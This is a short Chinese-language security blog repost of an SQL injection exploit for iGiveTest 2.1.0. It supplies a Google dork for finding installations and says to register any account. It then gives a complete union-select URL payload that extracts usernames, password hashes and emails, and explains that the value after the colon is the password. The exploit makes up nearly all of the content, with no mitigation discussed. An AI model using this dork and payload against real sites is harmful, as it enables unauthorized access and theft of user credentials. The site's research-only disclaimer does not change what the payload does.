iGiveTest 2.1.0 注入漏洞

admin 2021年4月3日19:42:25评论47 views字数 448阅读1分29秒阅读模式

# Version:
# Homepage: http://iGiveTest.com/
Google Dork: "Powered by iGiveTest"

随便注册个号

http://localhost/[PATH]/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1

iGiveTest 2.1.0 注入漏洞

第一个账号 冒号后面的就是密码了

文章来源于lcx.cc:iGiveTest 2.1.0 注入漏洞

相关推荐: 浅析vps为何这么脆弱

看“针对VPS的攻击方法”顺带翻到的内容…… honker90 发表于 2012-10-10 上午在t00ls看到vps攻击方法,那我就来说下vps为什么这么脆弱吧,仅代表个人想法,不是很全面,欢迎各种牛补充。 一说起vps大家都会联想到“廉价的服务器”、可以…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:42:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   iGiveTest 2.1.0 注入漏洞https://cn-sec.com/archives/324494.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息